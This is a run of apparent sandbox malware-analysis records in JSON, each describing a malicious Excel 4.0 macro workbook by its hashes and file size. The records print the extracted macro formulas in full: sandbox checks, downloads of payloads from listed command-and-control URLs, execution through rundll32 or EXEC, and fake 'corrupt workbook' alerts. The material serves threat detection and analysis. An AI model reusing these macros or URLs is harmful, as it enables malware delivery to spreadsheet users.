CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PwthBTYPOZ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8922aa42cc33d9817c19e59518290d6fa6fe8733ac849d9aa039d76f11677f6b"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"8922aa42cc33d9817c19e59518290d6fa6fe8733ac849d9aa039d76f11677f6b","filesize":167936,"md5":"c1a10e788144cf62f0ffa00b9554dbe6","sha1":"1c365e5b115ce00d7f9a7d2ad6f13b57f3085555","sha256":"8922aa42cc33d9817c19e59518290d6fa6fe8733ac849d9aa039d76f11677f6b","sha512":"140b9516d99b153827851f562fa0822e6927c567f26bb2c8b5653c8fa2b147b31fa2326b8c76b796e47d8ce8bd105e92fb873f5b307625aa6e16dcb50205f175","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8922aa42cc33d9817c19e59518290d6fa6fe8733ac849d9aa039d76f11677f6b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l7GYxcK6Q5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"893bd896d63a94cc56c9e9b5db030341d01760880f5635edf91a04e92ff8d9c4"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"893bd896d63a94cc56c9e9b5db030341d01760880f5635edf91a04e92ff8d9c4","filesize":185344,"md5":"4a18ef54fdd3f766abefeb70b1cd1076","sha1":"f1024791ab0d839d72d1c714f7e958bf1e1f1566","sha256":"893bd896d63a94cc56c9e9b5db030341d01760880f5635edf91a04e92ff8d9c4","sha512":"85fda3f50a2fef49954789f428ebc6849e5d0ba59f7f9404d9b57978babdf0c40fd7e4d6c9794022cb08064e916401e4b2a4a71f794db7c77de2d5555124c85c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"893bd896d63a94cc56c9e9b5db030341d01760880f5635edf91a04e92ff8d9c4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"893c557e0bc8a3279eebe91e53d45c7472815ce5d081f9e1b273a78f5ff9cd05"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"893c557e0bc8a3279eebe91e53d45c7472815ce5d081f9e1b273a78f5ff9cd05","filesize":168448,"md5":"66fc4f3cb0ede72f9f712405b00cd159","sha1":"29c397d972cd435c27c6fb914977f7e40166a45b","sha256":"893c557e0bc8a3279eebe91e53d45c7472815ce5d081f9e1b273a78f5ff9cd05","sha512":"717183deb7514a090d5e39d52983159288ea4e5434d7b1c67815e07d3f4cb426439d43c6eb91f4bcee7a0e9d1b74b5f56c0963ad3a158c32059ddeafa473273b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"893c557e0bc8a3279eebe91e53d45c7472815ce5d081f9e1b273a78f5ff9cd05.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uFwbRVfyO0\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"894147ff1e95abe2c7c70a92f3bad93e1b4de9e2a9018e6b5bbad2565a45051b"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"894147ff1e95abe2c7c70a92f3bad93e1b4de9e2a9018e6b5bbad2565a45051b","filesize":113664,"md5":"c5073da814403405d0c54adc1bdc9ba3","sha1":"f71566d1d431d860a16b4a02c96ea8633a28d096","sha256":"894147ff1e95abe2c7c70a92f3bad93e1b4de9e2a9018e6b5bbad2565a45051b","sha512":"2fbb99eca263d81ad53c77a31be0158ab0852a62a1f662f9dad3d8800adadd8dc04938a612b852a9ffedf04c8b6f99d44cf329505db3b4a468fc0be0c2d43c62","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"894147ff1e95abe2c7c70a92f3bad93e1b4de9e2a9018e6b5bbad2565a45051b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"wuiFZoFsIa\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"894db58ea34356dfc1d01f28e5649d77524116811329e983106f6cf7faafe8b9"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"894db58ea34356dfc1d01f28e5649d77524116811329e983106f6cf7faafe8b9","filesize":214528,"md5":"85de2d2efb00929b9a7fa336dbf5f6fe","sha1":"1c8a76b50353dda5af4b19aafb3acbf18b0290f0","sha256":"894db58ea34356dfc1d01f28e5649d77524116811329e983106f6cf7faafe8b9","sha512":"f1c52883206bf0cd5c65aea68a1516d1cd493a35482f6526cf465471cfac2c5530134d5256bccc18d6e4ff08b1e5066655f8aa51bbc0ec20e123acd1770ddd9a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"894db58ea34356dfc1d01f28e5649d77524116811329e983106f6cf7faafe8b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tKYrIpn8jV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8950a5d3de3522c33996be4443f85c90b4633238c1b91af55d957fbd3dfb5359"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"8950a5d3de3522c33996be4443f85c90b4633238c1b91af55d957fbd3dfb5359","filesize":177152,"md5":"e878c467effc98f815adb5562a8d1fe3","sha1":"11a3d1c7b737334f3edcb5c62fb11d3ddaa561ce","sha256":"8950a5d3de3522c33996be4443f85c90b4633238c1b91af55d957fbd3dfb5359","sha512":"5d8312f98c198337657931f59a9b886de687683d8e6e48f536502501475313dee57bfb2d9274724138317dfedb2c1dc7cb0e6d65fac67c387276a9b28a111382","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8950a5d3de3522c33996be4443f85c90b4633238c1b91af55d957fbd3dfb5359.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IVMyGg2Wt7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"895cf2d54a1e622315b546780d65fa513d1722a829b08c5244aecca9bbea1b7f"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"895cf2d54a1e622315b546780d65fa513d1722a829b08c5244aecca9bbea1b7f","filesize":167936,"md5":"ff7692c9dd731e6f51617bc4f32b471d","sha1":"6a26b60a1b58ab0c22e7f226bc01724711a5391c","sha256":"895cf2d54a1e622315b546780d65fa513d1722a829b08c5244aecca9bbea1b7f","sha512":"06e09e038eb359ed640c8f20bc0718720f0f533cf7853e5ccbee76b91b7bfbc8afed42a8e4349416578bdedf1423706de82495a9be65d23e1771e3a0d10b8b05","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"895cf2d54a1e622315b546780d65fa513d1722a829b08c5244aecca9bbea1b7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"V8v1MFfUgH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"896091f265ccb4da4f32c27349d5d618ebb2956b93ee59ee7d666c9983da107e"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"896091f265ccb4da4f32c27349d5d618ebb2956b93ee59ee7d666c9983da107e","filesize":209920,"md5":"fb53844ff9f6a9f326c8cd01478b03b1","sha1":"6bf94bcd9850f689b95002fd5a825c05d2dfa953","sha256":"896091f265ccb4da4f32c27349d5d618ebb2956b93ee59ee7d666c9983da107e","sha512":"8b4d2491b7f7e03ce6d62efb11f24750a157d0a630ad481d72a771514ec61935881ef40431ee2cbee9846009421932a4dff9dfb764deb4345741ff251b7b867d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"896091f265ccb4da4f32c27349d5d618ebb2956b93ee59ee7d666c9983da107e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ugJOEnUYgS\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8968f898bdc59888cdbf43fd3d07a2dc927e617eee3672e4db7b77c689cf0486"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"8968f898bdc59888cdbf43fd3d07a2dc927e617eee3672e4db7b77c689cf0486","filesize":104448,"md5":"9f69d0f1c8f54bf762c4560f5f96b43f","sha1":"04641ecb01706f108ee0a5a86e753693e84fff89","sha256":"8968f898bdc59888cdbf43fd3d07a2dc927e617eee3672e4db7b77c689cf0486","sha512":"e5475fa4a9d3fb5333fa4cc8809c145330404fa0d64c79a495e2d652cd115682a4459f9f8b4ca8e1aa0bdcdef771ec7874e65027beada88632b0c6012ffa1cbb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8968f898bdc59888cdbf43fd3d07a2dc927e617eee3672e4db7b77c689cf0486.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"CUNSOE5F6B\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"896f32a0c1727d52e78fdfb2d92bb2f8923615b89b25bc8da51e170ae2bd4c94"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"896f32a0c1727d52e78fdfb2d92bb2f8923615b89b25bc8da51e170ae2bd4c94","filesize":167936,"md5":"b2d38a04a9a52e60e176596477162a61","sha1":"629cc9406f918fa4610358aac6efbb80ae161bff","sha256":"896f32a0c1727d52e78fdfb2d92bb2f8923615b89b25bc8da51e170ae2bd4c94","sha512":"06e80c4e4ad853b91b7c998ab62452b658e25225e101a28d7c3833cf5c91eb10bcdc99038335f4c421acad10f0a1ce19ef643ccd0989e3f230ad87f501493d31","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"896f32a0c1727d52e78fdfb2d92bb2f8923615b89b25bc8da51e170ae2bd4c94.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ukdjtZcwwH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"89795f2fc057b2274a76e1ef28989cd3b028e891cdd55730b749fd34e84cb65d"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"89795f2fc057b2274a76e1ef28989cd3b028e891cdd55730b749fd34e84cb65d","filesize":104448,"md5":"f02fc64a1a0ac7704904b934e4b6b284","sha1":"857cb096b684bb85b1e49af0bee12483e2d24121","sha256":"89795f2fc057b2274a76e1ef28989cd3b028e891cdd55730b749fd34e84cb65d","sha512":"71f8cae962dda4d34b384ce203732842e4d7e45b9304fe6885622e0707f62f40b59764f59f6b4ca53c44362cea0c43cd991ca8366314a42ce77a27c04b597e97","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89795f2fc057b2274a76e1ef28989cd3b028e891cdd55730b749fd34e84cb65d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"JX2H51Xhk3\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"897be54421c4287e606d7ee53a3af7f24a7209e537d09bf6190af4326073b2f6"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"897be54421c4287e606d7ee53a3af7f24a7209e537d09bf6190af4326073b2f6","filesize":167936,"md5":"f39c9ece401c81fd4f32857cec7d4cb2","sha1":"3418f9c7af77d30f2876fbf054e232f489032e80","sha256":"897be54421c4287e606d7ee53a3af7f24a7209e537d09bf6190af4326073b2f6","sha512":"15386a94e35672a04b204302755eabe41150c0cb42f5a077d3008788dbb4ba42aee120e1d78c5dba4c1f611578cdf9242cd0f222f83c5b9ca98525a930384cfb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"897be54421c4287e606d7ee53a3af7f24a7209e537d09bf6190af4326073b2f6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RcKTkjyDp6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"897f7d99b91414c41b4eacd28ee58a9a15ca16736264b5173a2527fa6651bcc8"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"897f7d99b91414c41b4eacd28ee58a9a15ca16736264b5173a2527fa6651bcc8","filesize":104448,"md5":"1ab9680a745c4578c4e532e140ccbf58","sha1":"da59c314c248e7e9f6d80411ab901588eeb2f3c2","sha256":"897f7d99b91414c41b4eacd28ee58a9a15ca16736264b5173a2527fa6651bcc8","sha512":"01f394eed42feab51d135bce1b6dd3b346060f3d7f69baab0dc9df90b043694db6e691a120c6772a3ff8df883acf61a10350b632e5e833e6a4963da7983589b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"897f7d99b91414c41b4eacd28ee58a9a15ca16736264b5173a2527fa6651bcc8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9Ve85cbCNY\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8984483048787d91fb40cd134f2e2a393769dd75798acf91294f27d9ba01275d"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"8984483048787d91fb40cd134f2e2a393769dd75798acf91294f27d9ba01275d","filesize":209920,"md5":"13e15dad0f714a635eca44bacb5f8baa","sha1":"f88da39972290f2a96001ba496a1f7a5570c44cf","sha256":"8984483048787d91fb40cd134f2e2a393769dd75798acf91294f27d9ba01275d","sha512":"2e6c97402eee23f827b06dacb834115c5e20aa9c1ef15ae522e19e058448ef4f44818607c04427b22eadee4d02c3dde85f80fe3932571a6a1a030e5fb2174471","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8984483048787d91fb40cd134f2e2a393769dd75798acf91294f27d9ba01275d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0Lu1zL91MQ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8994a4775ce654ee18501bfa53aaababb0213fa0aa501fc363ae3fb028cf8d08"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"8994a4775ce654ee18501bfa53aaababb0213fa0aa501fc363ae3fb028cf8d08","filesize":243712,"md5":"6100eddb1a4ea6a9620d856fd34af3d8","sha1":"d22086115301f834d0b0a5493560c5b7fa3d6518","sha256":"8994a4775ce654ee18501bfa53aaababb0213fa0aa501fc363ae3fb028cf8d08","sha512":"2f888b1a1ff3cc356bd8cecaf21a9e350c461f9e9e3eac63aa1bb57b4aa880faf3362479e45c58316d2c503caae3978bcd24286541b672a99a50c998d2f5e814","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8994a4775ce654ee18501bfa53aaababb0213fa0aa501fc363ae3fb028cf8d08.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"LOG(1)\nLOG(R$1C$2)"}}}]}
